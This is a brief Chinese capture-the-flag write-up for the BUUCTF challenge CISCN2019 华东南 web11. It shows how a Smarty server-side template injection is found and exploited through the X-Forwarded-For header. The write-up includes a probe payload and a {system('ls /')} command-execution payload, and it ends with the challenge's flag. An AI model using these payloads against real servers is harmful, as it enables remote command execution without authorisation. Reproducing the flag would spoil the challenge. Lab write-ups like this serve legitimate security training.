buuctf | CISCN2019华东南web11
SSTI服务器端模板注入(Smarty模块)
打开
![在这里插入图片描述](https://img-blog.csdnimg.cn/4776d847065b4fdcad0d6870b6b931e2.png)
![index](https://img-blog.csdnimg.cn/806c5d7779404ed8af4aa5e0f52c3359.png)
右上角的ip,判断可能是 XFF
或client-ip
控制的,下面的 “Build With Smarty !”
,猜测可能存在Smarty模块类型的SSTI注入
burp抓包重放,添加行
X-Forwarded-For: {{7*7}}
![抓包重放](https://img-blog.csdnimg.cn/051d78cec778453d94c7a0c5af3d247a.png)
存在SSTI漏洞
X-Forwarded-For: {system('ls /')}
![ls /](https://img-blog.csdnimg.cn/75d4cad0a77248448ba80ba310992707.png)
得到flag
flag{34a8a3b3-fc8c-471b-b5cb-8782a05718e3}
![flag](https://img-blog.csdnimg.cn/a624cdd3f615403d93127da7a0cb1c6e.png)